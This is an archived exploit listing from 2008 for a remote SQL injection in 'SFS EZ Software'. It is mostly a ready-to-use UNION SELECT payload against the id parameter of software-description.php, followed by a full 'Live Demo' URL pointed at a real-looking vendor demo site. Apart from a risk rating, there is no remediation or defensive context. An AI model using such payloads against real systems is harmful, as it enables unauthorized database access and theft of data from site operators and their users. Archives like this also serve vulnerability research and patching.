[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : SFS EZ Software (id) Remote SQL Injection Vulnerability
# Published : 2008-10-31
# Author : x0r
# Previous Title : txtshop 1.0b (language) Local File Inclusion Vulnerability (win only)
# Next Title : ModernBill <= 4.4.x XSS / Remote File Inclusion Vulnerability
-=====================================-
Application : SFS EZ Software
Risk : High
FOund By: x0r
-=====================================-
Exploit: software/software-description.php?id=-5 union all select
1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/*
Live Demo:
http://www.turnkeyzone.com/demos/software/software-description.php?id=-5%20union%20all%20select%201,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/*
-=EOF=-
# www.Syue.com [2008-10-31]